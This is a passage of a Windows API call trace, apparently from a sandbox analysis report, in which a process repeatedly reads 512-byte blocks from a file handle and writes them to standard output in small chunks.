[0119.463] _get_osfhandle (_FileHandle=4) returned 0x54 
[0119.463] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] GetFileType (hFile=0x4c) returned 0x1 [0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] GetFileType (hFile=0x4c) returned 0x1 [0119.463] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.463] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.464] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.464] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 
0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] GetFileType (hFile=0x4c) returned 0x1 [0119.465] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.465] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.465] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.465] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.466] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, 
lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] GetFileType (hFile=0x4c) returned 0x1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.466] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, 
lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.467] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.467] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] GetFileType (hFile=0x4c) returned 0x1 [0119.467] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.467] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.468] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.468] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0119.468] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.468] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.468] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] 
GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] GetFileType (hFile=0x4c) returned 0x1 [0119.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.469] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.469] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.470] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | 
out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, 
lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.470] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.471] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.471] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.471] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.472] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) 
returned 1 [0119.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.472] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef168*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef168*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef1b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef1b8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] GetFileType (hFile=0x4c) returned 0x1 [0119.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.472] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef208*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef208*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef258*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef258*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2a8*, lpNumberOfBytesWritten=0x1ee2fc*=0x50, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef2f8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee2fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2f8*, lpNumberOfBytesWritten=0x1ee2fc*=0x20, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.473] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee2e8 | out: lpNewFilePointer=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0119.473] ReadFile (in: hFile=0x54, lpBuffer=0x1ef118, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee308, lpOverlapped=0x0 | out: lpBuffer=0x1ef118*, lpNumberOfBytesRead=0x1ee308*=0x200, lpOverlapped=0x0) returned 1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] GetFileType (hFile=0x4c) returned 0x1 [0119.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0119.473] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef118*, nNumberOfBytesToWrite=0x50, 
